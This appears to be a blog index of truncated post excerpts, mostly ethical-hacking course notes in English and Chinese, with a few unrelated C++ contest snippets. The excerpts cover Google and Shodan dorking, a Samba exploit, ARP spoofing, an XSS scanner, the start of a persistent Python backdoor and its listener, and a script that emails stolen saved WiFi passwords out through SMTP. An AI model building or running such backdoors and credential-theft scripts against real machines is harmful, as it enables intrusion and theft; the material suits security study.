https://www.shodan.io Shodan 是由web工程师John Natherly (马瑟利) 编写的,被称为“最可怕的搜索引擎”,可扫描一切可以联网的设备。 除了常见的web服务器外,还可以扫描防火墙,路由器,交换机,摄像头,打印机等一切可联网设备。 ip 114.114.114.114 C:\Users\DI
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan restult - services: Scan resulst - Vulnerabilities: Scan result - credentials: Try to login the database using
Sever side attacks code execution Let‘s analyze the Zenmap scan result first and search for something vulnerabilities about Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/
Targeted packet sniffing airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface] Now all the data will be stored in the file name specified after the -write option. We can analyze this data using Wireshark. The only problem is that t
Implementing Code To Discover XSS in Parameters 1. Watch the URL of the XSS reflected page carefully. 2. Add the test_xss_in_link method in the Scanner class. #!/usr/bin/env pythonimport requestsimport refrom bs4 import BeautifulSoupfrom urllib.p
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to the web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check o
EXPLOITATION - XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/St
Polish the Python code using sending requests in a session Class Scanner. #!/usr/bin/env pythonimport requestsimport refrom urllib.parse import urljoinclass Scanner: def __init__(self, url, ignore_links): self.session = requests.Session()
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check of th
Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -
Polish the Python code by adding the become_persistent function. #!/usr/bin/env pythonimport jsonimport socketimport subprocessimport osimport base64import sysimport shutilclass Backdoor: def __init__(self, ip, port): self.become_persistent()
1. site语法 2. filetype语法 site:stbu.edu.cn filetype:txt 密码 3. inurl / allinurl语法,一般使用inurl 4. intitle / allintitle语法 5. intext / allintext语法 6. 其他语法 7. 特殊字符 | & + - " 8. 搜索网络设备 i
Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: An incorrect command is sent. The correct command is miss-used. Listener: #!/usr/bin/env pythonimport socketimport jsonimport base64class Listener:
File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read the file as a sequence of characters. 2. Send this sequence of characters. 3. Create a new empty file at the destination. 4. Store the transferred sequence
思路十分简单,答案只有 3 种可能,但是有一些细节需要额外注意一下. code: #include <bits/stdc++.h>#define N 300002 #define setIO(s) freopen(s".in","r",stdin) using namespace std; int val[N],hd[N],to[N<<1],nex[N<<1],d1[N],d2[N],n,edges,maxx,mx,m
Stealing WiFi Password Saved on a Computer #!/usr/bin/env pythonimport smtplibimport subprocessimport redef send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, passwor
https://klionsec.github.io/2014/12/14/search-hacking/ 熟练利用Google hacking 来辅助我们快速渗透 http://www.sec-redclub.com/archives/116/ 红日安全 https://www.freebuf.com/articles/web/32610.html
Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they did not send a request. 2. Clients trust response without any form of verification. 1. Run the following command on the victim - Windows 10 Machine. ar
Preparation: Python Libray in the following programming: 1. Requests Document: https://2.python-requests.org//en/master/ 2. Beautiful Soup Documentation: https://www.crummy.com/software/BeautifulSoup/bs4/doc/ Install the lib on Kali Linux: apt-get instal
密码破解:字典,hybrid混合(添加简单数字或符号),蛮力 木马 间谍软件 键盘记录 rootkit 密码恢复软件:password recovery bundle trail windows登录:SAM 验证本地,远程 加密 系统路径下,system32/config/sam 工具:Ophcrack and lophtcrack 移动工具:flexispy password crabber
原文:klionsec 基本命令 intitle: 从网页标题中搜索指定的关键字 inurl: 从url中搜索指定的关键字 intext: 从网页中搜索指定的关键字 filetype: 搜索指定的文件后缀 site: 在某个指定的网站内搜索指定的内容 link: 搜索与该链接有关的链接 通配符 +
原文地址:https://medium.freecodecamp.org/modern-frontend-hacking-cheatsheets-df9c2566c72a The best front-end hacking cheatsheets — all in one place.(最好的前端黑客秘籍) 用心记住所有API是不可能的,因此才会有秘籍的诞生。 1.Javascript ES2015 features 2.Javascrip
#include<cstdio> #include<iostream> #include<algorithm> #include<queue> #include<cstring> #include<string> #include<stack> #include<vector> #include<set> #include<map> #include<cmath> using
1) 下载镜像,虚拟机启动 https://download.vulnhub.com/devrandom/pipe.ova 2) nmap 扫描探测 Nmap 扫描开路: ╰─ nmap -Pn -sV -p- 10.10.202.0/24 Nmap scan report for 10.10.202.247 Host is up (0.0068s latency). Not shown: 65531 filtered ports PORT STA